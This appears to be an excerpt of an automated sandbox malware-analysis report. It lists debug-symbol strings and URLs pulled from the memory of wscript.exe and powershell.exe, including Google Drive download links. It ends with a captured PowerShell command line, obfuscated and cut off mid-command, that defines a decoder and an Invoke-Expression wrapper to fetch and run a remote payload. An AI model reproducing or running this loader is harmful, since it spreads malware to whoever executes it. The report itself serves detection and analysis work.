Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb1 source: powershell.exe, 00000003.00000002.1477405694.00000245188C0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: lib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1476770908.0000024518751000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32N source: powershell.exe, 00000003.00000002.1478677403.0000024518932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: rlib.pdb source: powershell.exe, 00000003.00000002.1475618652.00000245186D5000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Target.pdb source: powershell.exe, 00000003.00000002.1475618652.0000024518688000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000003.00000002.1475618652.0000024518688000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.v |
Source: wscript.exe, 00000000.00000003.1313680179.00000231779F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314579860.00000231779F1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1315096548.00000231779D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1313805648.00000231779D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326774060.0000023177C60000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1313680179.00000231779F0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?82507bda4611d |
Source: wscript.exe, 00000000.00000002.1326774060.0000023177C60000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe |
Source: wscript.exe, 00000000.00000002.1325736248.0000023175C07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1324822095.0000023175C07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1324163948.0000023175B9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1322539019.0000023175B95000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enT: |
Source: wscript.exe, 00000000.00000003.1314982983.0000023177CB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1314661704.0000023177C8E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?82507bda46 |
Source: powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024502053000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.1471665681.0000024510415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500261000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500261000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.1437259239.0000024501B22000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000003.00000002.1437259239.0000024501B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2wP |
Source: powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.1437259239.00000245006EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.00000245006EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1SEGcwBcOPuC6M5vDjkNXiPzaZozdUe2w&export=download |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500487000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.1437259239.0000024501543000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.1471665681.0000024510415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1471665681.00000245102D3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.1437259239.0000024500754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502019000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.0000024502040000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245006E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.00000245020AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1437259239.000002450203C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne; $Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis) boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog ';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen. ';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity 'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols (Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv ');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColume |